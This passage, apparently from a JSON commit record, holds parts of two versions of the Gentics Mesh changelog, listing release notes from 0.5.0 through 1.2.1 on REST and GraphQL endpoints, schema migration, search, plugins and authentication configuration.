lead to incorrect column values for GraphQL errors was fixed.\n\nicon:plus[] The OrientDB dependency was updated to version 2.2.18.\n\nicon:plus[] GraphQL: The container\/s field was renamed to content\/s to ease usage.\n\nicon:plus[] GraphQL: It is no longer possible to resolve nodes using the provided webroot path. The path argument and the resolving was moved to the `content` field.\n\n== 0.9.2 (04.04.2017)\n\nicon:plus[] The `{apiLatest}\/admin\/backup`, `{apiLatest}\/admin\/restore`, `{apiLatest}\/admin\/import`, `{apiLatest}\/admin\/export` endpoints were added to the REST API. These endpoint allow the creation of backup dumps.\n\nicon:plus[] GraphQL: It is now possible to execute elasticsearch queries. within the GraphQL query.\n\nicon:plus[] GraphQL: It is now possible to resolve a partial web root path using the `child` field of a node.\n\nicon:plus[] GraphQL: It is now possible to resolve information about the running mesh instance via GraphQL.\n\nicon:check[] Various issues with the linkType argument within the GraphQL API have been fixed.\n\nicon:check[] Fixed NPE that occurred when loading a container for a language which did not exist.\n\n== 0.9.1 (28.03.2017)\n\nicon:check[] The `Access-Control-Allow-Credentials: true` Header will now be returned when CORS support is enabled.\n\nicon:check[] A NullPointerException within the Java Rest Client was fixed.\n\nicon:check[] The AngularJS Demo was updated.\n\n== 0.9.0 (27.03.2017)\n\nicon:plus[] Gentics Mesh now supports GraphQL.\n\nicon:important[] The `expandAll` and `expand` parameters will be removed within an upcoming release of Gentics Mesh. We highly recommend to use the GraphQL endpoint instead if you want to fetch deeply nested data.\n\nicon:plus[] Schema name validation - Schema and microschema names must only contain letter, number or underscore characters.\n\nicon:plus[] Node Tag Endpoint\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/tags` was enhanced. It is now possible to post a list of tag references which will be applied to the node. Tags which are not part of the list will removed from the node. Tags which do not exist will be created. Please note that tag families will not automatically be created.\n\nThe `tags` field within the node response was updated accordingly.\n\n== 0.8.3 (24.02.2017)\n\nicon:plus[] Tags are now also indexed in the node document in the field `tagFamilies`, grouped by tag families.\n\n== 0.8.2 (23.02.2017)\n\nicon:check[] The trigram filter configuration was updated so that all characters will be used to tokenize the content.\n\n== 0.8.1 (21.02.2017)\n\nicon:check[] A bug which prevented index creation in certain cases was fixed.\n\n== 0.8.0 (10.02.2017)\n\nicon:plus[] Names, string fields and html field values will now be indexed using the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/guide\/current\/ngrams-compound-words.html[trigram analyzer].\n\nicon:plus[] Binary Endpoint Overhaul\n\nThe field API endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field` was removed and replaced by the binary `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary` endpoint.\nThe binary endpoints are now also versioning aware and handle conflict detection. It is thus required to add the `language` and `version` form data parameters to the upload request.\n\nicon:plus[] Transform Endpoint Overhaul\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field\/transform` was renamed to `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binaryTransform`.\nThe transform endpoint will now return the updated node.\n\nicon:plus[] The no longer needed schemaReference property was removed from node update requests.\n\nicon:plus[] The rootNodeUuid property within node project response was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"rootNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"rootNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] The parentNodeUuid property within node create requests was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"parentNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"parentNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] JSON Schema information have been added to the RAML API documentation. This information can now be used to generate REST model types for various programming languages.\n\nicon:plus[] The navigation response JSON was restructured. The root element was removed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n \"root\" : {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n }\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n}\n----\n____\n\n\n\n== 0.7.0 (19.01.2017)\n\nicon:bullhorn[] Content releases support\n\n[quote]\n____\nThis version of Gentics Mesh introduces _Content Releases_. A detailed description of this feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n____\n\nicon:bullhorn[] Versioning support\n\n[quote]\n____\nThis version of Gentics Mesh introduces versioning of contents. A detailed description of the versioning feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n\nImportant changes summary:\n\n* Node update request must now include the version information\n* The query parameter `?version=published` must be used to load published nodes. Otherwise the node will not be found because the default version scope is __draft__.\n* Two additional permissions for nodes have been added: __publish__, __readpublished__\n\nExisting databases will automatically be migrated during the first setup.\n____\n\nicon:plus[] The missing *availableLanguages* and *defaultLanguage* parameters have been added to the *mesh-ui-config.js* file. Previously no language was configured which removed the option to translate contents.\n\nicon:plus[] Image Property Support - The binary field will now automatically contain properties for image *width*, image *height* and the main *dominant color* in the image.\n\nicon:plus[] API Version endpoint - It is now possible to load the mesh version information via a `GET` request to `{apiLatest}\/`.\n\nicon:plus[] Project endpoint - The current project information can now be loaded via a `GET` request to `{apiLatest}\/:projectName`.\n\nicon:check[] When the search indices where recreated with the reindex endpoint, the mapping for the raw fields was not added. This has been fixed now.\n\nicon:check[] The search index mapping of fields of type \"list\" were incorrect and have been fixed now.\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.29 (07.03.2017)\n\nicon:plus[] The documentation has been enhanced.\n\nicon:check[] Missing fields could cause error responses. Instead the missing fields will now be set to null instead.\n\n== 0.6.28 (21.10.2016)\n\nicon:check[] Missing fields could cause error responses. Instead the missing fields will now be set to null instead.\n\n== 0.6.27 (07.10.2016)\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.26 (05.10.2016)\n\nicon:plus[] The maximum transformation depth limit was raised from 2 to 3.\n\n== 0.6.25 (20.09.2016)\n\nicon:plus[] The used Vert.x version was bumped to 3.3.3.\n\n== 0.6.24 (19.09.2016)\n\nicon:plus[] The Gentics Mesh admin ui has been updated. The UI will no longer send basic auth information for succeeding requests which were invoked after the login action had been invoked. Instead the basic auth login information will only be send directly during login.\n\nicon:check[] A bug within the breadcrumb resolver has been fixed. Previously breadcrumbs did not account for language fallback options and thus returned a 404 path for nodes which used a different language compared to the language of the retrieved node. This has been fixed.\n\n== 0.6.23 (14.09.2016)\n\nicon:check[] The missing availableLanguages and defaultLanguage parameters have been added to the mesh-ui-config.js file. Previously no language was configured which removed the option to translate contents.\n\n== 0.6.22 (24.08.2016)\n\nicon:plus[] It is now possible to publish language variants. Previously it was only possible to publish nodes. This affected all language variants of the node.\n\n== 0.6.21 (17.08.2016)\n\nicon:plus[] The debug output in case of errors has been enhanced.\n\n== 0.6.20 (03.08.2016)\n\nicon:check[] The changelog processing action for existing installations was fixed.\n\n== 0.6.19 (02.08.2016)\n\nicon:check[] Mesh-Admin-UI was updated to version 0.6.13\n\n== 0.6.18 (24.06.2016)\n\nicon:check[] Previously a search request which queried a lot of nodes could result in a StackOverflow exception. The cause for this exception was fixed.\n\nicon:plus[] The gentics\/mesh and gentics\/mesh-demo images now use the alpine flavour base image and thus the size of the image stack has been reduced.\n\nicon:plus[] The performance of the search endpoints have been improved.\n\n== 0.6.17 (22.06.2016)\n\nicon:check[] The path property within the node response breadcrumb was not set. The property will contain the resolved webroot path for the breadcrumb element. No value will be set if the resolveLinks query parameter was configured or set to OFF. CL-459\n\n== 0.6.16 (21.06.2016)\n\nicon:plus[] Gzip compression support was added. JSON responses are now pretty printed by default.\n\n== 0.6.15 (20.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.12\n\n== 0.6.13 (17.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.10\n\n== 0.6.12 (02.06.2016)\n\nicon:check[] A bug within the schema migration process was fixed. The label field was previously not correctly handled for newly added fields.\n\nicon:check[] A bug within the schema migration process was fixed. The segmentfield value was reset to null when updating a schema. This has been fixed now.\n\nicon:check[] The \"AllChangeProperties\" field was removed from the JSON response of schema fields.\n\n== 0.6.11 (31.05.2016)\n\nicon:check[] A bug which prevented node reference deletion was fixed. It is now possible to delete node references using a json null value in update requests.\n\nicon:plus[] OrientDB was updated to version 2.1.18\n\n== 0.6.10 (25.05.2016)\n\nicon:check[] It is now possible to grant and revoke permissions to microschemas using the roles\/:uuid\/permissions endpoint.\n\n== 0.6.9 (04.05.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] It is now possible to also include non-container nodes in a navigation response using the includeAll parameter. By default only container nodes will be included in the response.\n\nicon:check[] A minor issue within the webroot path handling of node references was fixed. CL-425\n\nicon:check[] Fixed label and allow field property handling when updating schema fields. CL-357\n\nicon:check[] Various concurrency issues have been addressed.\n\n== 0.6.8 (26.04.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] OrientDB was updated to version 2.1.16\n\n== 0.6.7 (25.04.2016)\n\nicon:check[] Update checker. A bug that prevented the update checker from working correctly was fixed.\n\n== 0.6.6 (06.04.2016)\n\nicon:bullhorn[] Public open beta release\n\nicon:check[] A bug within the reindex changelog entry was fixed. The bug prevented the node index to be recreated.\n\nicon:check[] The mesh-ui-config.js default apiUrl parameter was changed to {apiLatest} in order to allow access from hosts other than localhost.\n\n== 0.6.5 (05.04.2016)\n\nicon:check[] The displayField value was missing within the node search document. The value was added.\n\nicon:check[] The changelog execution information was added to the demo data dump and thus no further changelog execution will happen during mesh demo startup.\n\nicon:check[] An edge case that could cause multiple stack overflow exception was fixed.\n\nicon:plus[] A Cache-Control: no-cache header has been set to mesh responses.\n\nicon:plus[] The mesh-ui was updated.\n\nicon:check[] Various search index related bugs have been fixed.\n\nicon:plus[] The mesh-ui configuration file was renamed to mesh-ui.config.js\n\n== 0.6.4 (24.03.2016)\n\nicon:plus[] The mesh ui was updated.\n\n== 0.6.3 (22.03.2016)\n\nicon:plus[] Database migration\/changelog system.\n A changelog system was added to mesh. The system is used to upgrade mesh data from one mesh version to another.\n\nicon:plus[] The *published* flag can now be referenced within an elasticsearch query.\n\nicon:check[] It was not possible to update the *allow* flag for schema lists (e.g. micronode lists). This has been fixed now.\n\nicon:check[] The schema migration process did not update the node search index correctly.\n In some cases duplicate nodes would be returned (the old node and the migrated one).\n This has been fixed. Only the latest version of nodes will be returned now.\n\nicon:check[] A NPE was fixed which occurred when updating or creating a node list which included elements which could not be found. (CL-358)\n\nicon:check[] A typo within the search model document for users was fixed.\n The property `emailadress` was renamed to `emailaddress`.\n\n== 0.6.2 (15.03.2016)\n\nicon:check[] The microschema and schema permission field was always empty for newly created elements.\n\n== 0.6.1 (14.03.2016)\n\nicon:plus[] Added mesh-ui to gentics\/mesh docker image\n\n== 0.6.0 (14.03.2016)\n\nicon:plus[] Added image API endpoint\n Images can now be resized and cropped using the image endpoint.\n\nicon:plus[] Added schema versioning\n\nicon:plus[] Added schema migration process\n It is now possible to update schemas. Custom migration\n handlers can be defined in order to modify the node data.\n\nicon:plus[] Added Micronodes\/Microschemas\n A new field type has been added which allows creation of micronodes.\n\nicon:plus[] Webroot API\n The webroot REST endpoint was added which allows easy retrieval of nodes by its web path.\n\nicon:plus[] JWT Authentication support has been added\n It is now possible to select JWT in order to authenticate the user.\n\nicon:plus[] Navigation Endpoint\n The navigation REST endpoint was added which allows retrieval of navigation tree data which can be used to render navigations.\n\nicon:plus[] Added docker support\n It is now possible to start mesh using the gentics\/mesh or gentics\/mesh-demo docker image.\n\nicon:plus[] Vert.x update\n The Vert.x dependency was updated to version 3.2.1\n\nicon:check[] Fixed paging issue for nested tags\n\n== 0.5.0 (17.11.2015)\n\nicon:important[] Closed beta release\n","old_contents":"---\ntitle: Changelog\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n\/\/\/\/\n* Write changelog entries in present tense\n* Include GitHub issue or PR if possible using link:http:\/\/...[#123] format\n* Review your changelog entries\n* Don't include security sensitive information in the changelog\n* Include links to documentation if possible\n\/\/\/\/\n\n= Gentics Mesh Changelog\n\n[[expected]]\n== Planned Future Changes\n\n* With the release of `\/api\/v2` of the API, v1 has been deprecated. Version 2 introduced changes in the GraphQL API only. See the note in the changelog for link:#v0.35.0[v0.35.0] for details. The `\/api\/v1` still works like before, we will however cease support for `\/api\/v1` in the future. The Java REST client still uses v1 per default but can be set to v2. We advise to do so while `\/api\/v1` is still supported to prevent failures in the future.\n\n* The `html` field type will be removed in the future. Instead the `string` type will be used in combination with an additional configuration property for this field in the schema. Of course, your existing schemas will be migrated for you.\n\n* The support for the embedded Elasticsearch will be dropped in the future. It is highly recommended to link:{{< relref \"elasticsearch.asciidoc\" >}}#_dedicated_elasticsearch[setup Elasticsearch as a dedicated service].\n\n* The Mesh Server will require Java 11 with the release of 2.0.0. The runtime support for Java 8 will be dropped. The Mesh Java REST client will still be usable with Java 8.\n\n[[Unreleased]]\n\nicon:plus[] Core: The amount of the deployed REST API verticles can now be link:{{< relref \"administration-guide.asciidoc\" >}}#_httpsssl[configured] and its default has been changed from 5 to 2 * CPU Cores.\n\nicon:plus[] Core: It is now possible to use Gentics Mesh in read only mode. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#readonly[documentation] for more information.\n\nicon:check[] REST: The `\/health\/live` and `\/health\/ready` endpoints have been added to the REST API. These endpoints are also available on the monitoring server, but adding them to the REST server makes it possible for load balancers to monitor the server on the same port that used to proxy the requests.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.4`.\n\nicon:plus[] Core: The core plugin framework library was updated to version `2.1.0`.\n\n[[v1.2.1]]\n== 1.2.1 (22.11.2019)\n\nicon:check[] Core: Mesh now uses a different parser for processing `*.docx` and `*.pptx` files. Parsing these files will now require far less memory.\n\nicon:check[] GraphQL: Fixed fetching node references from users. link:https:\/\/github.com\/gentics\/mesh\/issues\/393[#393] link:https:\/\/github.com\/gentics\/mesh\/issues\/934[#934]\n\nicon:check[] Java Rest Client: Fixed a bug that some generic methods would not allow response objects of any class.\n\n\n[[v1.2.0]]\n== 1.2.0 (20.11.2019)\n\nWARNING: The internal database structure has changed significantly to avoid vertices with many edges. This will result in a higher write performance on bigger systems. For this change, the API of Gentics Mesh did not change at all. When starting with this version on an existing database, the structure changes will be applied automatically, which will take some time to complete.\n\nCAUTION: If you are running Gentics Mesh in cluster mode, you need to link:{{< relref \"clustering.asciidoc\" >}}#_setup[initialize the cluster again]. You must use the `-initCluster` command line argument or set the `MESH_CLUSTER_INIT` to `true` on one of the master instances of the cluster.\n\nicon:check[] Java Rest Client: Generic methods (`get`, `post`, `put`, `delete`) now allow response objects of any class.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#110---2019-11-20[1.1.0].\n\n[[v1.1.1]]\n== 1.1.1 (11.11.2019)\n\nicon:plus[] GraphQL: The GraphQL Endpoint now supports the `wait` query-parameter like the Search Endpoint does. link:https:\/\/github.com\/gentics\/mesh\/issues\/805[#805]\n\nicon:plus[] Clustering: The role of an instance has been added to the link:https:\/\/getmesh.io\/docs\/api\/#admin_cluster_status_get[cluster status response].\n\nicon:check[] Core: Some optimizations to uploading binaries have been made.\n\nicon:check[] Core: Fixed an issues that sometimes caused errors when performing write requests during a schema migration.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#102---2019-11-11[1.0.2].\n\n[[v1.1.0]]\n== 1.1.0 (29.10.2019)\n\nWARNING: The internal monitoring library has been changed from dropwizard to link:https:\/\/micrometer.io\/[micrometer]. This allows better labeling of various metrics for link:https:\/\/prometheus.io\/[Prometheus]. With this change, some metrics names from Vert.x have been changed. See link:https:\/\/vertx.io\/docs\/vertx-micrometer-metrics\/java\/#_vert_x_core_tools_metrics[here] for the new list of Vert.x metrics. By default, JVM metrics are also recorded. This can be configured in the link:{{< relref \"administration-guide.asciidoc\" >}}#_monitoring_options[monitoring options]. Also, the response structure in the `\/search\/status` endpoint has changed. Take a look at the link:https:\/\/getmesh.io\/docs\/api\/#search_status_get[API docs] for a new example.\n\nicon:plus[] Search: A new setting has been added which can be used to enable Elasticsearch 7 support. The `search.complianceMode` setting in the `mesh.yml` file can be used to control the compliance mode for Elasticsearch support. The setting can also be controlled via the `MESH_ELASTICSEARCH_COMPLIANCE_MODE` environment variable. Currently there are two modes: `ES_7` for Elasticsearch 7.x and `ES_6` for Elasticsearch 6.x.\nBy default `ES_6` will be used thus no changes are required for existing installations.\n\nicon:plus[] Core: A new endpoint for administration has been added. The `\/admin\/debuginfo` endpoint lets you gain various informations about the system. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#debuginfo[administration guide] for details.\n\nicon:plus[] Monitoring: New metrics for caching statistics have been added. Take a look at the link:{{< relref \"monitoring.asciidoc\" >}}#metrics[documentation] for the new metrics.\n\nicon:check[] OrientDB: The included OrientDB version has been updated to version 3.0.24\n\nicon:check[] Core: Some extensive logging messages will now only be logged on a finer log level. These include error messages for GraphQL queries, on closed client connections and requests sent to Elasticsearch.\n\n[[v1.0.2]]\n== 1.0.2 (11.10.2019)\n\nicon:check[] Core: The internal memory usage has been reduced.\n\n[[v1.0.1]]\n== 1.0.1 (08.10.2019)\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#101---2019-10-08[1.0.1]\n\nicon:plus[] Core: Link resolving now supports branches. Take a look at the link:{{< relref \"features.asciidoc\" >}}#linkresolvingbranches[documentation] for more information. link:https:\/\/github.com\/gentics\/mesh-incubator\/issues\/38[#38]\n\n[[v1.0.0]]\n== 1.0.0 (03.10.2019)\n\nicon:bullhorn[] New UI\n\n[quote]\n____\n\nThis version of Gentics Mesh contains the a new UI which is accessible via `\/mesh-ui`. The old UI is still part of this release and can be accessed via `\/mesh-ui-v1`.\n\nThe following noteworthy aspects of the UI have been updated \/ altered:\n\n* The permission management has been reworked\n* The new schema editor which features autocompletion\n* The usability of the edit view has been enhanced\n* The editor for HTML fields has been replaced\n* A new image editor has been added which now supports focal point handling\n* Language handling has been improved\n* The UI no longer depends on Elasticsearch\n____\n\nicon:bullhorn[] New defaults\n\n[quote]\n____\n\nFor new server installations (`mesh-server`) the Elasticsearch embedded server will no longer be enabled by default. The demo server (`mesh-demo`) will still start the embedded Elasticsearch server for ease of use.\nIt is still possible to enable the embedded server via the `search.startEmbedded: true` and `search.url: http:\/\/localhost:9200` settings in the `mesh.yml` file.\n____\n\n\nicon:check[] Search: Synchronizing the search index when starting after Gentics Mesh has not been stopped properly will not block the startup routine anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/862[#862]\n\nicon:check[] Core: Path resolving performance has been increased.\n\n[[v0.41.0]]\n== 0.41.0 (01.10.2019)\n\nicon:plus[] REST: The ETag generation was reworked. This means that previously generated ETags are no longer valid.\n\nicon:check[] REST: Fixed ETag generation when `fields` or `rolePerms` was used. Previously these parameters did not affect the ETag. link:https:\/\/github.com\/gentics\/mesh\/issues\/881[#881]\n\nCAUTION: Reworked OAuth2 \/ OIDC support\n\n[quote]\n____\n\nThe `security.oauth2` configuration section was removed. Instead the `security.publicKeysPath` property was added.\n\nIn order to provide support for more authentication providers it is now possible to specify the path to a file which contains the public keys in the configuration. These keys will be used to validate the access tokens.\n\nYou can read more about how to setup OAuth2 \/ OIDC in the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2_oidc[OAuth2 \/ OIDC] guide.\n\nIt is now also possible for Authentication Service Plugins to provide Json Web Keys (JWK) to Gentics Mesh. Plugins can load the accepted JWK's from the authentication provider server and return it to Gentics Mesh. A plugin has to implement the `getPublicKeys()` method to support this.\n\nPlugins can now implement the `extractUsername()` method to return the username that should be used to handle mappings between Mesh and JWT.\n\nPlease note that installations which already use an authentication plugin can either update the plugin and provide the public keys or manually add the public key to the `public-keys.json` configuration file.\n____\n\n\n[[v0.40.3]]\n== 0.40.3 (13.09.2019)\n\nicon:plus[] Java Rest Client: Various new methods have been added to handle endpoint agnostic requests (`get(), post(), delete(), put()`). These methods can be used to handle plugin requests.\n\nicon:check[] Migration: It is now possible to apply schema \/ microschema changes that include the `name` property via the `changes` endpoint. Previously the name property was not utilized.\n\n[[v0.40.2]]\n== 0.40.2 (09.09.2019)\n\nicon:plus[] Core: It is now possible to configure the transaction retry limit using the `MESH_GRAPH_TX_RETRY_LIMIT` environment variable or the `storage.txRetryLimit` parameter.\n\nicon:check[] Core: The default value for `storage.synchronizeWrites` has been changed to `true`.\n\nicon:check[] Core: The default value for the OrientDB parameter `tx.retry.delay` has been increased to 10ms, and the constant delay will be used instead of growing linearly. It is now possible to configure the delay via the `MESH_GRAPH_TX_RETRY_DELAY` environment variable.\n\nicon:check[] Config: It is now possible to override the mapping mode with the `MESH_ELASTICSEARCH_MAPPING_MODE` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/878[#878]\n\n[[v0.40.1]]\n== 0.40.1 (06.09.2019)\n\nCAUTION: REST: When updating permissions to an element, unset permissions in the request will not change these permissions anymore. Previously, unset permission were set to false.\n\nicon:check[] Core: Various handlers were blocking the event loop when run. This has been fixed now.\n\nicon:check[] Core: Fixed delayed initialization of `VersionPurgeJobImpl` vertices. Previously the type was not setup during start up and this resulted in a warning when the type was first used.\n\nicon:plus[] Java Rest Client: The `createSchema()` methods now accept a `ParameterProvider` vararg parameter.\n\nicon:check[] Core: Schema validation will no longer fail by default, when Elasticsearch is not available. The previous behavior can be enforced by adding `?strictValidation=true`.\n\nicon:check[] GraphQL: Fixed a bug that prevented loading of permissions of an element.\n\nicon:plus[] GraphQL: Added the `rolePerms` field to mesh elements. This allows you to load permissions of a role, similar to the link:{{< relref \"features.asciidoc\" >}}#_querying_permissions[`?role` query parameter in REST].\n\n[[v0.40.0]]\n== 0.40.0 (27.08.2019)\n\nicon:bullhorn[] Image Manipulation: The new resizing options `smart`, `prop` and `force` have been added.\n\n[quote]\n____\n\n**force**\n\nThe `?resize=force` mode will resize the image to the specified dimensions. This can lead to a distorted image when the aspect ratio of the source image does not match the destination aspect ratio.\n\n**smart**\n\nWhen using `?resize=smart` the resizer will automatically crop the image to the desired dimensions instead of distorting it when providing `width` _and_ `height` parameters which would result in an aspect ratio that is different from the original images aspect ratio.\n\nThe new default image resize mode is `smart` which potentially crops an image when requested aspect ratio that diverge from the source images aspectratio. The old behaviour can now be achieved by using the `?resize=force` parameter.\n\n**prop**\n\nThe `?resize=prop` mode will resize the image proportionally so that the resulting destination format fits inside the provided dimensions (`width`, `height`). No distortion of the image will occur.\n\nFor details on image manipulation and resizing opions read the link:{{< relref \"image-manipulation.asciidoc\" >}}[Image Manipulation documentation].\n\nThis change might not automatically apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be manually cleared.\n\n____\n\nicon:plus[] Search: A new search option `search.mappingMode` has been added. The mapping mode setting influences how mappings for fields will be generated. By default the mode `DYNAMIC` is used. In this mode mappings are generated as before. When using the mode `STRICT` only mappings for fields which have a custom mapping via the `elasticsearch` schema parameter will be created. This is useful if you want to have finer control of what contents should be added to Elasticsearch.\n\nicon:plus[] Graph: The default value for `tx.retry.delay` has been set to 0. The tx delay will thus be disabled by default.\n\nicon:plus[] Clustering: The `storage.synchronizeWrites` option will be enabled by default when clustering is active.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.23\n\n[[v0.39.2]]\n== 0.39.2 (20.08.2019)\n\nicon:check[] A regression in `v0.38.0` caused migration errors for nodes which contained not yet populated fields. This issue has now been fixed. Failed migrations can be re-run by deleting the failed job via `DELETE \/api\/v2\/admin\/jobs\/{jobUuid}` and triggering `POST \/api\/v2\/{project}\/branches\/{branchUuid}\/migrateSchemas` to create a new migration job. link:https:\/\/github.com\/gentics\/mesh\/issues\/847[#847]\n\nicon:plus[] Graph: It is now possible to configure the OrientDB transaction delay by adding the `tx.retry.delay` parameter to the the `storage.parameters` field.\n\n[[v0.39.1]]\n== 0.39.1 (14.08.2019)\n\nicon:check[] A regression in `v0.39.0` broke the `\/demo` endpoint. This has been fixed now and the demo application is accessible again.\n\n[[v0.39.0]]\n== 0.39.0 (13.08.2019)\n\nicon:plus[] Core: The core has been reworked to add future support for multitenancy in Gentics Mesh.\n\n[[v0.38.1]]\n== 0.38.1 (12.08.2019)\n\nicon:check[] Plugins: A bug in the plugin startup process has been fixed. Previously plugins were not initialized prior to registration.\n\nicon:check[] GraphQL: The `pluginApi` field will no longer be added to the schema if no GraphQL plugins have been deployed to avoid schema validation errors. link:https:\/\/github.com\/gentics\/mesh\/issues\/842[#842]\n\nicon:plus[] Changelog: The `ReleaseBranchRenameChange` entry has been updated to reduce required memory and increase execution performance on large databases (2m+ nodes).\n\nicon:plus[] REST: A `X-Powered-By` header was added to all http responses.\n\n[[v0.38.0]]\n== 0.38.0 (09.08.2019)\n\nCAUTION: Removal of mapper script support\n\n[quote]\n____\n\nThe mapper script support has been dropped due to the deprecation of the Nashorn JavaScript engine. The functionality of mapper scripts can be replaced by usage of the new link:{{< relref \"plugin-types\/auth-service-plugin.asciidoc\" >}}[Authentication Service Plugin API].\n\nThe `auth.mapperScriptDevMode` and `auth.mapperScriptPath` configuration options are no longer needed and have been removed.\n____\n\nicon:check[]: Plugins: The query type of plugins will now automatically be prefixed with the plugin apiName to ensure that no type conflicts can occur.\n\n[[v0.37.1]]\n== 0.37.1 (06.08.2019)\n\nicon:plus[] Core: The core Dagger library was updated from version `2.11` to `2.24`.\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\n[[v0.37.0]]\n== 0.37.0 (05.08.2019)\n\nicon:bullhorn[] New Plugin System\n\n[quote]\n____\n\nThe Plugin System has been overhauled.\n\n*REST API changes*\n\nPreviously plugins were assigned a UUID and could thus be managed using this uuid:\n\n* `DELETE \/admin\/plugins\/{uuid}`\n\nThe new plugin system will now utilize the plugin id for these REST and GraphQL API instead. The pluginId is unique to each plugin and a better and easier to grasp identifier for a plugin.\n\n*New Java API \/ Structure*\n\nThe plugin API and structure has been overhauled and existing plugins need to be migrated (link:{{< relref \"plugin-migration.asciidoc\" >}}[Migration Guide]) to the new API in order to be deployable.\n\n*GraphQL Plugin support*\n\nIt is now possible to create plugins which extend the GraphQL API. Plugins which provide link:{{< relref \"plugin-development.asciidoc\" >}}#_graphql_plugin[GraphQL extensions] will be made accessible under the `pluginApi` GraphQL field.\n\n*Dropped maven repository support*\n\nIt is no longer possible to load plugins directly via Maven Coordinates. The REST API will only accept a filesystem paths to plugins.\n\n*Classloader fix*\n\nThe classloader mechanism has been altered. Plugins can now provide their own library versions. Previously a class which was also present in Gentics Mesh Server was loaded from the server class loader instead of the plugin. This has been fixed now.\n\n*Examples \/ Guide*\n\nThe plugin development process documentation has been enhanced.\n\n* link:{{< relref \"plugin-development\" >}}[Plugin Development]\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples[Plugin Examples]\n* link:{{< relref \"guides\/mesh-library-plugin\" >}}[Example Plugin Guide]\n\n____\n\nicon:check[] Core: Fixed a bug that caused an error when changing a field in a schema to a binary field.\n\nicon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.0`.\n\n[[v0.36.8]]\n== 0.36.8 (02.08.2019)\n\nicon:check[] Core: Fixed a bug that caused node contents to not be found when migrating from an old version of Gentics Mesh (0.22.x) to the current version.\n\n[[v0.36.7]]\n== 0.36.7 (23.07.2019)\n\nicon:check[] Backup: Fixed a bug in the backup handler which prevented the backup process to switch back to the correct status after a backup failed due to filesystem errors.\n\nicon:plus[] Java Rest Client: Added `#equals` and `#hashCode` implementations to REST models.\n\nicon:plus[] Graph: It is now possible to configure the OrientDB `RID_BAG_EMBEDDED_TO_SBTREEBONSAI_THRESHOLD` setting by adding the `ridBag.embeddedToSbtreeBonsaiThreshold` parameter to the the `storage.parameters` field.\n\nicon:plus[] REST: An error will now be returned when sending the `newPassword` field in the login request when the `forcedPasswordChange` flag has not been set.\n\nicon:plus[] REST: The webroot responses will now contain the header `Webroot-Node-Uuid` which identifies the node of the loaded content.\n\nicon:plus[] REST: The authentication and element loading performance has been greatly increased.\n\n[[v0.36.6]]\n== 0.36.6 (16.07.2019)\n\nicon:plus[] REST: The performance of path resolving has been improved.\n\nicon:plus[] Core: A new configuration section has been added. The `cache` options in the `mesh.yml` can now be used to control cache settings. The `cache.pathCacheSize` config setting and `MESH_CACHE_PATH_SIZE` environment variable can be used to control the path cache which will improve webroot and GraphQL path resolving performance.\n\nicon:plus[] REST: The `webroot` endpoint will now set the `Cache-Control` header to `public` if the requested node can be read using the anonymous role. Otherwise the header will be set to `private`. This information is useful if you want to use a Caching Proxy in-between Gentics Mesh and your front-end application.\n\nicon:check[] Core: Performance of loading nodes has been improved.\n\nicon:check[] Core: Request logging now uses the link:https:\/\/vertx.io\/docs\/apidocs\/io\/vertx\/ext\/web\/handler\/LoggerFormat.html#SHORT[short format], which also shows how much time the the response took to complete.\n\nicon:check[] Core: Improved performance when loading images with image manipulation.\n\n[[v0.36.5]]\n== 